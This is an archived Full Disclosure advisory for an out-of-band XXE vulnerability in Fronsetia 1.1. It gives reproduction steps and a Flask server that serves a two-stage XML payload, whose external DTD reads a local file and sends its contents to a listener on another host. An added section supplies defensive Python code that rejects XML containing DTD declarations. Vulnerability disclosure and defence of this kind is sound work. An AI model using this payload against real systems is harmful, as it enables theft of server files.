XXE OOB - fronsetiav1.1
2024-11-22 03:31:08 Author: seclists.org (view original) Views: 1 Bookmark


Full Disclosure mailing list archives


From: Andrey Stoykov <mwebsec () gmail com>
Date: Thu, 21 Nov 2024 17:46:46 +0000

# Exploit Title: XXE OOB - fronsetiav1.1
# Date: 11/2024
# Exploit Author: Andrey Stoykov
# Version: 1.1
# Tested on: Debian 12
# Blog:
https://msecureltd.blogspot.com/2024/11/friday-fun-pentest-series-15-oob-xxe.html

XXE OOB

Description:

- It was found that the application was vulnerable to XXE (XML External Entity Injection)

Steps to Reproduce:

1. Add a Python3 server to serve the malicious XXE payload
2. Add a file on the file system to be read via the application XXE payload
echo 123123 > /tmp/123
3. Enter the following URL as input
http://192.168.78.128:8080/fronsetia/show_operations.jsp?Fronsetia_WSDL=http://192.168.78.1:10000/testxxeService?wsdl

// Python Server Code

from flask import Flask, Response
import logging

app = Flask(__name__)

# Set up logging so every request made by the target is visible on the console
logging.basicConfig(level=logging.DEBUG)

@app.route('/testxxeService')
def catch_all():
    # First stage: the "WSDL" the application fetches. Its internal subset
    # declares a parameter entity that points at the external DTD served below.
    app.logger.debug("Serving XXE payload")
    xml = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
  <!ENTITY % dtd SYSTEM "http://192.168.78.1:10000/data.dtd"> %dtd;
]>
<data>&send;</data>"""
    return Response(xml, mimetype='text/xml', status=200)

@app.route('/data.dtd')
def hello():
    # Second stage: the external DTD. The &#37; character reference yields a
    # literal % in eval's replacement text, so %eval; declares the exfil entity,
    # whose system identifier carries the file contents to the listener on port 8000.
    app.logger.debug("DTD requested")
    xml = """<!ENTITY % file SYSTEM "file:///tmp/123">
<!ENTITY % eval "<!ENTITY &#37; exfil SYSTEM 'http://192.168.78.1:8000/?content=%file;'>">
%eval;
%exfil;"""
    return Response(xml, mimetype='text/xml', status=200)

if __name__ == "__main__":
    app.run(host='0.0.0.0', port=10000)
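The server above is the attacker side of the exchange; on the defender side the fix is to never hand untrusted XML (here, a WSDL fetched from a user-supplied URL) to a parser that processes DTDs. The following is an added example, not code from the original post or from the Fronsetia project: a standard-library-only pre-parse gate in Python that records DOCTYPE and entity declarations without resolving anything and refuses the document if any are present. The sample documents, the placeholder host name dtd-host.invalid and the function names scan_xml and parse_untrusted_xml are my own constructions.

```python
# Added example (not part of the original post): a defensive pre-parse gate for
# untrusted XML. It uses only the standard library's expat bindings and refuses
# any document carrying a DOCTYPE or entity declarations before a full parser
# (and its entity resolver) ever sees it.
import xml.parsers.expat as expat
import xml.etree.ElementTree as ET
from dataclasses import dataclass, field


@dataclass
class DtdFindings:
    has_doctype: bool = False
    # (entity name, is parameter entity, system identifier) for external entities
    external_entities: list = field(default_factory=list)
    # names of entities declared inline (no SYSTEM/PUBLIC identifier)
    internal_entities: list = field(default_factory=list)

    @property
    def unsafe(self) -> bool:
        # A WSDL never needs a DTD, so any DOCTYPE at all is grounds for rejection
        return self.has_doctype or bool(self.external_entities) or bool(self.internal_entities)


def scan_xml(data: bytes) -> DtdFindings:
    """Record DOCTYPE and entity declarations without resolving anything."""
    findings = DtdFindings()
    parser = expat.ParserCreate()
    # Never fetch external parameter entities or an external DTD subset while scanning
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_doctype(name, sysid, pubid, has_internal_subset):
        findings.has_doctype = True
        if sysid:  # <!DOCTYPE x SYSTEM "..."> also points at an external resource
            findings.external_entities.append(("<!DOCTYPE " + name + ">", True, sysid))

    def on_entity(name, is_param, value, base, sysid, pubid, notation):
        if sysid:
            findings.external_entities.append((name, bool(is_param), sysid))
        else:
            findings.internal_entities.append(name)

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    try:
        parser.Parse(data, True)
    except expat.ExpatError:
        # Malformed input is rejected by the real parser anyway; declarations
        # seen before the error are still reported
        pass
    return findings


def parse_untrusted_xml(data: bytes) -> ET.Element:
    """Parse only if the scan found no DTD machinery; otherwise raise."""
    findings = scan_xml(data)
    if findings.unsafe:
        raise ValueError("rejected XML with DTD/entity declarations: "
                         f"external={findings.external_entities} "
                         f"internal={findings.internal_entities}")
    return ET.fromstring(data)


# Constructed sample modelled on the first-stage payload above; the host name
# is a placeholder, not an address from the advisory.
STAGE1_PAYLOAD = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
  <!ENTITY % dtd SYSTEM "http://dtd-host.invalid:10000/data.dtd"> %dtd;
]>
<data>&send;</data>"""

# Constructed benign WSDL-like document, and one with only an inline entity
CLEAN_WSDL = b"<definitions><service name='demo'/></definitions>"
INLINE_ENTITY = b"<!DOCTYPE d [<!ENTITY x \"1\">]><d>&x;</d>"

if __name__ == "__main__":
    for sample in (STAGE1_PAYLOAD, INLINE_ENTITY, CLEAN_WSDL):
        try:
            root = parse_untrusted_xml(sample)
            print("accepted:", root.tag)
        except ValueError as exc:
            print(exc)
```

The scan flags the first stage on its external parameter entity alone, before any network or file access could happen; the inline-entity document is refused too, because the policy is "no DOCTYPE at all" rather than a list of known-bad patterns. The same policy applies to the Java side of an application like this one: disable DTD processing, or at least external entity resolution, on the XML parser factory it uses to read the WSDL.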
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/



Source: https://seclists.org/fulldisclosure/2024/Nov/9